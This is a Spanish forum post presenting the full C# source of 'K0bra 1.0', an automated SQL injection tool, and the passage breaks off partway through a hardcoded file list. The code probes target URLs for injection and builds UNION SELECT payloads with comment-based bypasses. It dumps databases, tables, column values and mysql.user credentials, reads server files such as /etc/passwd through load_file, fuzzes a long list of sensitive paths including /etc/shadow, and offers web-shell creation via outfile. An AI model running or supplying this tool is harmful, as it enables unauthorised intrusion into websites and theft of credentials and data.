[C#] K0bra 1.0
Publicado: 15 Ago 2014, 16:57
Un simple scanner SQLI hecho en C#.
Con las siguientes funciones :
[+] Comprobar vulnerabilidad
[+] Buscar numero de columnas
[+] Buscar automaticamente el numero para mostrar datos
[+] Mostras tablas
[+] Mostrar columnas
[+] Mostrar bases de datos
[+] Mostrar tablas de otra DB
[+] Mostrar columnas de una tabla de otra DB
[+] Mostrar usuarios de mysql.user
[+] Buscar archivos usando load_file
[+] Mostrar un archivo usando load_file
[+] Mostrar valores
[+] Mostrar informacion sobre la DB
[+] Crear una shell usando outfile
[+] Todo se guarda en logs ordenados
Unas imagenes :
Los codigos :
Form1.cs
SQLI_Scanner.cs
DH_Tools.cs
Si quieren lo puede bajar de [Enlace externo eliminado para invitados].
Con las siguientes funciones :
[+] Comprobar vulnerabilidad
[+] Buscar numero de columnas
[+] Buscar automaticamente el numero para mostrar datos
[+] Mostras tablas
[+] Mostrar columnas
[+] Mostrar bases de datos
[+] Mostrar tablas de otra DB
[+] Mostrar columnas de una tabla de otra DB
[+] Mostrar usuarios de mysql.user
[+] Buscar archivos usando load_file
[+] Mostrar un archivo usando load_file
[+] Mostrar valores
[+] Mostrar informacion sobre la DB
[+] Crear una shell usando outfile
[+] Todo se guarda en logs ordenados
Unas imagenes :
Los codigos :
Form1.cs
Código: Seleccionar todo
// K0bra 1.0
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Text.RegularExpressions;
using System.IO;
namespace K0bra
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void button1_Click_1(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Checking ...";
this.Refresh();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
string rta = kobra.checkvul();
if (rta == "OK")
{
toolStripStatusLabel1.Text = "[+] Scanning ...";
this.Refresh();
rta = kobra.get_columns_length();
if (rta == "OK")
{
textBox1.Text = kobra.generate_sqli();
tools.savefile("logs/"+tools.urisplit(textBox1.Text,"host")+".txt","[+] SQLI : "+textBox1.Text);
toolStripStatusLabel1.Text = "[+] Vulnerable !";
this.Refresh();
}
else
{
toolStripStatusLabel1.Text = "[-] Columns length not found";
this.Refresh();
}
}
else
{
toolStripStatusLabel1.Text = "[-] Not vulnerable";
this.Refresh();
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button2_Click(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Getting Details ...";
this.Refresh();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
string rta = kobra.get_details();
if (rta == "")
{
MessageBox.Show("Not Found");
}
else
{
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Details : " + rta);
}
richTextBox1.AppendText(rta);
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void listBox1_DoubleClick(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Getting DBS ...";
this.Refresh();
listBox1.Items.Clear();
listBox2.Items.Clear();
listBox3.Items.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
List<String> databases = kobra.get_databases();
foreach (string database in databases)
{
listBox1.Items.Add(database);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] DB : " + database);
}
if (listBox1.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void listBox2_DoubleClick(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Getting Tables ...";
this.Refresh();
listBox2.Items.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
List<String> tablas = kobra.get_tables_data(listBox1.SelectedItem.ToString());
foreach (string tabla in tablas)
{
listBox2.Items.Add(tabla);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Table : " + tabla);
}
if (listBox2.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void listBox3_DoubleClick(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Getting Columns ...";
this.Refresh();
listBox3.Items.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
List<String> columnas = kobra.get_columns_data(listBox1.SelectedItem.ToString(),listBox2.SelectedItem.ToString());
foreach (string columna in columnas)
{
listBox3.Items.Add(columna);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Column : " + columna);
}
if (listBox3.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button3_Click(object sender, EventArgs e)
{
listView1.Items.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
toolStripStatusLabel1.Text = "[+] Getting Values ...";
this.Refresh();
List<String> usuarios = kobra.get_dump_values(textBox2.Text, textBox3.Text, textBox4.Text);
foreach (string usuario in usuarios)
{
Match regex = Regex.Match(usuario, "_0x3a_(.*?)_0x3a_(.*?)_0x3a_", RegexOptions.IgnoreCase);
if (regex.Success)
{
ListViewItem item = new ListViewItem();
item.Text = regex.Groups[1].Value;
item.SubItems.Add(regex.Groups[2].Value);
listView1.Items.Add(item);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] " + textBox3.Text + " : " + regex.Groups[1].Value);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] " + textBox4.Text + " : " + regex.Groups[2].Value);
}
}
if (listView1.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button4_Click(object sender, EventArgs e)
{
listView2.Items.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
toolStripStatusLabel1.Text = "[+] Getting users ... ";
this.Refresh();
List<String> usuarios = kobra.get_mysql_users();
foreach (string usuario in usuarios)
{
Match regex = Regex.Match(usuario, "_0x3a_(.*?)_0x3a_(.*?)_0x3a_(.*?)_0x3a_", RegexOptions.IgnoreCase);
if (regex.Success)
{
ListViewItem item = new ListViewItem();
item.Text = regex.Groups[1].Value;
item.SubItems.Add(regex.Groups[2].Value);
item.SubItems.Add(regex.Groups[3].Value);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Host : " + regex.Groups[1].Value);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] User : " + regex.Groups[2].Value);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Password : " + regex.Groups[3].Value);
listView2.Items.Add(item);
}
}
if (listView2.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button5_Click(object sender, EventArgs e)
{
listBox4.Items.Clear();
SQLI_Scanner kobra = new SQLI_Scanner();
DH_Tools tools = new DH_Tools();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
toolStripStatusLabel1.Text = "[+] Finding Files ... ";
this.Refresh();
List<String> archivos = kobra.fuzz_files();
foreach (string archivo in archivos)
{
listBox4.Items.Add(archivo);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] File Found : " + archivo);
}
if (listBox4.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button6_Click(object sender, EventArgs e)
{
richTextBox2.Clear();
DH_Tools tools = new DH_Tools();
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
toolStripStatusLabel1.Text = "[+] Reading File ... ";
this.Refresh();
string rta = kobra.read_file(textBox5.Text);
if (rta == "")
{
MessageBox.Show("Not Found");
}
else
{
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] File : " + textBox5.Text);
tools.savefile("logs/" + tools.urisplit(textBox1.Text, "host") + ".txt", "[+] Content : " + rta);
}
richTextBox2.AppendText(rta + Environment.NewLine);
toolStripStatusLabel1.Text = "[+] Finished";
this.Refresh();
}
private void button7_Click(object sender, EventArgs e)
{
SQLI_Scanner kobra = new SQLI_Scanner();
kobra.target = textBox1.Text;
kobra.set_bypass(comboBox1.Text);
toolStripStatusLabel1.Text = "[+] Creating Shell ... ";
this.Refresh();
string code = kobra.make_shell(textBox6.Text,textBox7.Text);
textBox8.Text = code;
}
private void Form1_Load(object sender, EventArgs e)
{
if (!Directory.Exists("logs"))
{
System.IO.Directory.CreateDirectory("logs");
}
}
private void button8_Click(object sender, EventArgs e)
{
DH_Tools tools = new DH_Tools();
tools.console("start " + "logs/" + tools.urisplit(textBox1.Text, "host") + ".txt");
}
}
}
// The End ?
Código: Seleccionar todo
// SQLI Scanner Functions
// Version : Beta
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
namespace K0bra
{
class SQLI_Scanner
{
string targetnow;
string bypass1now;
string bypass2now;
int columnsnow;
int number_datanow;
public string target
{
set { targetnow = value; }
get { return targetnow; }
}
public string bypass1
{
set { bypass1now = value; }
get { return bypass1now; }
}
public string bypass2 {
set { bypass2now = value; }
get { return bypass2now; }
}
public int re_columns_length
{
set { columnsnow = value; }
get { return columnsnow; }
}
public int re_number_data
{
set { number_datanow = value; }
get { return number_datanow; }
}
public SQLI_Scanner()
{
target = "";
bypass1 = "";
bypass2 = "";
re_columns_length = 0;
re_number_data = 0;
}
public void set_bypass(string opcion)
{
if (opcion == "--")
{
bypass1now = "+";
bypass2now = "--";
}
if (opcion == "/*") {
bypass1now = "/**/";
bypass2now = "/**/";
}
if (opcion == "%20")
{
bypass1now = "%20";
bypass2now = "%00";
}
}
public string checkvul()
{
string response = "";
string code = "";
string url1 = "";
string url2 = "";
url1 = toma(target + "1" + bypass1 + "and" + bypass1 + "1=0" + bypass2);
url2 = toma(target + "1" + bypass1 + "and" + bypass1 + "1=1" + bypass2);
if (url1 == url2)
{
response = "Fuck";
}
else
{
response = "OK";
}
return response;
}
public string get_columns_length()
{
int numcontrol = 25;
string sqli = "concat(0x4b30425241,1,0x4b30425241)";
string controlsql = "";
string respuesta = "";
for (int num = 2; num <= numcontrol; num += 1)
{
sqli = sqli + "," + "concat(0x4b30425241," + num + ",0x4b30425241)";
string code = toma(target + "-1+union+select+" + sqli);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
re_columns_length = num;
re_number_data = Convert.ToInt32(regex.Groups[1].Value);
numcontrol = 0;
controlsql = "OK";
}
}
if (controlsql == "OK")
{
respuesta = "OK";
}
else
{
respuesta = "Fuck";
}
return respuesta;
}
public string generate_sqli()
{
string sqli = "1";
string sqlifinal = "";
for (int num = 2; num <= re_columns_length; num += 1) {
sqli = sqli + "," + num;
}
sqli = sqli.Replace(Convert.ToString(re_number_data), "hackman");
sqlifinal = target + "1" + bypass1 + "and" + bypass1 + "1=0" + bypass1 + "union" + bypass1 + "select" + bypass1 + sqli;
return sqlifinal;
}
public string get_details()
{
string url = target;
string code = "";
string respuesta = "";
string url1 = url;
string url2 = url;
string url3 = url;
url1 = url1.Replace("hackman", "concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)");
url2 = url2.Replace("hackman", "0x4b30425241");
url3 = url3.Replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))");
respuesta = respuesta + "[+] Searching ..." + "\n\n";
code = toma(url1);
Match regex = Regex.Match(code, "K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
respuesta = respuesta + "[+] User : " + regex.Groups[1].Value + "\n";
respuesta = respuesta + "[+] Database : " + regex.Groups[2].Value + "\n";
respuesta = respuesta + "[+] Version : " + regex.Groups[3].Value + "\n";
}
code = toma(url2 + bypass1 + "from" + bypass1 + "mysql.user" + bypass2);
regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
respuesta = respuesta + "[+] mysql_user() : ON" + "\n";
}
else
{
respuesta = respuesta + "[+] mysql_user() : OFF" + "\n";
}
code = toma(url2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass2);
regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
respuesta = respuesta + "[+] information_schema.tables : ON" + "\n";
}
else
{
respuesta = respuesta + "[+] information_schema.tables : OFF" + "\n";
}
code = toma(url3);
regex = Regex.Match(code, "K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
respuesta = respuesta + "[+] load_file() : ON" + "\n";
}
else
{
respuesta = respuesta + "[+] load_file() : OFF" + "\n";
}
respuesta = respuesta + "\n" + "[+] Finished";
return respuesta;
}
public List<String> get_tables()
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string code = "";
List<string> tablas = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 17; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
tablas.Add(regex.Groups[1].Value);
}
}
return tablas;
}
public List<String> get_columns(string tabla)
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string tablaz = hexencode(tabla);
string code = "";
List<string> columnas = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tablaz + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tablaz + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
columnas.Add(regex.Groups[1].Value);
}
}
return columnas;
}
public List<String> get_databases()
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string code = "";
List<string> databases = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.schemata" + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.schemata" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
databases.Add(regex.Groups[1].Value);
}
}
return databases;
}
public List<String> get_tables_data(string dat) {
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string data = hexencode(dat);
string code = "";
List<string> tablas = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "where" + bypass1 + "table_schema=" + data + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.tables" + bypass1 + "where" + bypass1 + "table_schema=" + data + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
tablas.Add(regex.Groups[1].Value);
}
}
return tablas;
}
public List<String> get_columns_data(string dat,string tab)
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string data = hexencode(dat);
string tabx = hexencode(tab);
string code = "";
List<string> columnas = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tabx + bypass1 + "and" + bypass1 + "table_schema=" + data + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "information_schema.columns" + bypass1 + "where" + bypass1 + "table_name=" + tabx + bypass1 + "and" + bypass1 + "table_schema=" + data + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
columnas.Add(regex.Groups[1].Value);
}
}
return columnas;
}
public List<String> get_mysql_users()
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string code = "";
List<string> usuarios = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))");
code = toma(web1 + bypass1 + "from" + bypass1 + "mysql.user" + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + "mysql.user" + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2", RegexOptions.IgnoreCase);
if (regex.Success)
{
usuarios.Add("_0x3a_" + regex.Groups[1].Value + "_0x3a_" + regex.Groups[2].Value + "_0x3a_" + regex.Groups[3].Value + "_0x3a_");
}
}
return usuarios;
}
public List<String> get_dump_values(string tablanow,string col1now,string col2now)
{
string url = target;
string web1 = url;
string web2 = url;
string cantidad = "";
string code = "";
string col1 = col1now;
string col2 = col2now;
string table = tablanow;
List<string> valores = new List<string>();
web1 = web1.Replace("hackman", "unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))");
web2 = web2.Replace("hackman", "unhex(hex(concat(0x4b30425241," + col1 + ",0x4b30425241," + col2 + ",0x4b30425241)))");
code = toma(web1 + bypass1 + "from" + bypass1 + table + bypass2);
Match regex = Regex.Match(code, "K0BRA(.*?)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
cantidad = regex.Groups[1].Value;
}
for (int num = 0; num <= Convert.ToInt16(cantidad); num++)
{
code = toma(web2 + bypass1 + "from" + bypass1 + table + bypass1 + "limit" + bypass1 + num + ",1" + bypass2);
regex = Regex.Match(code, "K0BRA(.*)K0BRA(.*)K0BRA", RegexOptions.IgnoreCase);
if (regex.Success)
{
valores.Add("_0x3a_" + regex.Groups[1].Value + "_0x3a_" + regex.Groups[2].Value + "_0x3a_");
}
}
return valores;
}
public string read_file(string fil)
{
string url = target;
string web1 = url;
string file = hexencode(fil);
string code = "";
string response = "";
web1 = web1.Replace("hackman", "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(" + file + "),char(69,82,84,79,82,56,53,52))))");
code = toma(web1);
Match regex = Regex.Match(code, "ERTOR854(.*?)ERTOR854", RegexOptions.IgnoreCase | RegexOptions.Singleline);
if (regex.Success)
{
response = regex.Groups[1].Value;
}
return response;
}
public List<String> fuzz_files()
{
string url = target;
string urlgen = "";
string code = "";
List<string> rutas = new List<string> { "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/aca.txt", "C:/xampp/htdocs/admin.php", "C:/xampp/htdocs/leer.txt", "../../../boot.ini", "../../../../boot.ini", "../../../../../boot.ini", "../../../../../../boot.ini", "/etc/passwd", "/etc/shadow", "/etc/shadow~", "/etc/hosts", "/etc/motd", "/etc/apache/apache.conf", "/etc/fstab", "/etc/apache2/apache2.conf", "/etc/apache/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache2/httpd.conf", "/etc/apache2/sites-available/default", "/etc/mysql/my.cnf", "/etc/my.cnf", "/etc/sysconfig/network-scripts/ifcfg-eth0", "/etc/redhat-release", "/etc/httpd/conf.d/php.conf", "/etc/pam.d/proftpd", "/etc/phpmyadmin/config.inc.php", "/var/www/config.php", "/etc/httpd/logs/error_log", "/etc/httpd/logs/error.log", "/etc/httpd/logs/access_log", "/etc/httpd/logs/access.log", "/var/log/apache/error_log", "/var/log/apache/error.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/apache2/error_log", "/var/log/apache2/error.log", "/var/log/apache2/access_log", "/var/log/apache2/access.log", "/var/www/logs/error_log", "/var/www/logs/error.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/error_log", "/usr/local/apache/logs/error.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/error_log", "/var/log/error.log", "/var/log/access_log", "/var/log/access.log", "/etc/group", "/etc/security/group", "/etc/security/passwd", "/etc/security/user", "/etc/security/environ", "/etc/security/limits", "/usr/lib/security/mkuser.default", "/apache/logs/access.log", "/apache/logs/error.log", "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/log/httpd/access_log", "/var/log/httpd/error_log", "/apache2/logs/error.log", "/apache2/logs/access.log", "/logs/error.log", "/logs/access.log", "/usr/local/apache2/logs/access_log", "/usr/local/apache2/logs/access.log", "/usr/local/apache2/logs/error_log", "/usr/local/apache2/logs/error.log", "/var/log/httpd/access.log", "/var/log/httpd/error.log", "/opt/lampp/logs/access_log", "/opt/lampp/logs/error_log", "/opt/xampp/logs/access_log", "/opt/xampp/logs/error_log", "/opt/lampp/logs/access.log", "/opt/lampp/logs/error.log", "/opt/xampp/logs/access.log", "/opt/xampp/logs/error.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/access.log", "C:/ProgramFiles/ApacheGroup/Apache/logs/error.log", "/usr/local/apache/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/etc/apache/conf/httpd.conf", "/usr/local/etc/apache/conf/httpd.conf", "/usr/local/apache/httpd.conf", "/usr/local/apache2/httpd.conf", "/usr/local/httpd/conf/httpd.conf", "/usr/local/etc/apache2/conf/httpd.conf", "/usr/local/etc/httpd/conf/httpd.conf", "/usr/apache2/conf/httpd.conf", "/usr/apache/conf/httpd.conf", "/usr/local/apps/apache2/conf/httpd.conf", "/usr/local/apps/apache/conf/httpd.conf", "/etc/apache2/conf/httpd.conf", "/etc/http/conf/httpd.conf", "/etc/httpd/httpd.conf", "/etc/http/httpd.conf", "/etc/httpd.conf", "/opt/apache/conf/httpd.conf", "/opt/apache2/conf/httpd.conf", "/var/www/conf/httpd.conf", "/private/etc/httpd/httpd.conf", "/private/etc/httpd/httpd.conf.default", "/Volumes/webBackup/opt/apache2/conf/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf", "/Volumes/webBackup/private/etc/httpd/httpd.conf.default", "C:/ProgramFiles/ApacheGroup/Apache/conf/httpd.conf", "C:/ProgramFiles/ApacheGroup/Apache2/conf/httpd.conf", "C:/ProgramFiles/xampp/apache/conf/httpd.conf", "/usr/local/php/httpd.conf.php", "/usr/local/php4/httpd.conf.php", "/usr/local/php5/httpd.conf.php", "/usr/local/php/httpd.conf", "/usr/local/php4/httpd.conf", "/usr/local/php5/httpd.conf", "/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf", "/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf", "/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php", "/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php", "/usr/local/etc/apache/vhosts.conf", "/etc/php.ini", "/bin/php.ini", "/etc/httpd/php.ini", "/usr/lib/php.ini", "/usr/lib/php/php.ini", "/usr/local/etc/php.ini", "/usr/local/lib/php.ini", "/usr/local/php/lib/php.ini", "/usr/local/php4/lib/php.ini", "/usr/local/php5/lib/php.ini", "/usr/local/apache/conf/php.ini", "/etc/php4.4/fcgi/php.ini", "/etc/php4/apache/php.ini", "/etc/php4/apache2/php.ini", "/etc/php5/apache/php.ini", "/etc/php5/apache2/php.ini", "/etc/php/php.ini", "/etc/php/php4/php.ini", "/etc/php/apache/php.ini", "/etc/php/apache2/php.ini", "/web/conf/php.ini", "/usr/local/Zend/etc/php.ini", "/opt/xampp/etc/php.ini", "/var/local/www/conf/php.ini", "/etc/php/cgi/php.ini", "/etc/php4/cgi/php.ini", "/etc/php5/cgi/php.ini", "c:/php5/php.ini", "c:/php4/php.ini", "c:/php/php.ini", "c:/PHP/php.ini", "c:/WINDOWS/php.ini", "c:/WINNT/php.ini", "c:/apache/php/php.ini", "c:/xampp/apache/bin/php.ini", "c:/NetServer/bin/stable/apache/php.ini", "c:/home2/bin/stable/apache/php.ini", "c:/home/bin/stable/apache/php.ini", "/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini", "/usr/local/cpanel/logs", "/usr/local/cpanel/logs/stats_log", "/usr/local/cpanel/logs/access_log", "/usr/local/cpanel/logs/error_log", "/usr/local/cpanel/logs/license_log", "/usr/local/cpanel/logs/login_log", "/var/cpanel/cpanel.config", "/var/log/mysql/mysql-bin.log", "/var/log/mysql.log", "/var/log/mysqlderror.log", "/var/log/mysql/mysql.log", "/var/log/mysql/mysql-slow.log", "/var/mysql.log", "/var/lib/mysql/my.cnf", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/hostname.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql.err", "C:/ProgramFiles/MySQL/MySQLServer5.0/data/mysql-bin.log", "C:/ProgramFiles/MySQL/data/hostname.err", "C:/ProgramFiles/MySQL/data/mysql.log", "C:/ProgramFiles/MySQL/data/mysql.err", "C:/ProgramFiles/MySQL/data/mysql-bin.log", "C:/MySQL/data/hostname.err", "C:/MySQL/data/mysql.log", "C:/MySQL/data/mysql.err", "C:/MySQL/data/mysql-bin.log", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.ini", "C:/ProgramFiles/MySQL/MySQLServer5.0/my.cnf", "C:/ProgramFiles/MySQL/my.ini", "C:/ProgramFiles/MySQL/my.cnf", "C:/MySQL/my.ini", "C:/MySQL/my.cnf", "/etc/logrotate.d/proftpd", "/www/logs/proftpd.system.log", "/var/log/proftpd", "/etc/proftp.conf", "/etc/protpd/proftpd.conf", "/etc/vhcs2/proftpd/proftpd.conf", "/etc/proftpd/modules.conf", "/var/log/vsftpd.log", "/etc/vsftpd.chroot_list", "/etc/logrotate.d/vsftpd.log", "/etc/vsftpd/vsftpd.conf", "/etc/vsftpd.conf", "/etc/chrootUsers", "/var/log/xferlog", "/var/adm/log/xferlog", "/etc/wu-ftpd/ftpaccess", "/etc/wu-ftpd/ftphosts", "/etc/wu-ftpd/ftpusers", "/usr/sbin/pure-config.pl", "/usr/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.conf", "/usr/local/etc/pure-ftpd.conf", "/usr/local/etc/pureftpd.pdb", "/usr/local/pureftpd/etc/pureftpd.pdb", "/usr/local/pureftpd/sbin/pure-config.pl", "/usr/local/pureftpd/etc/pure-ftpd.conf", "/etc/pure-ftpd/pure-ftpd.pdb", "/etc/pureftpd.pdb", "/etc/pureftpd.passwd", 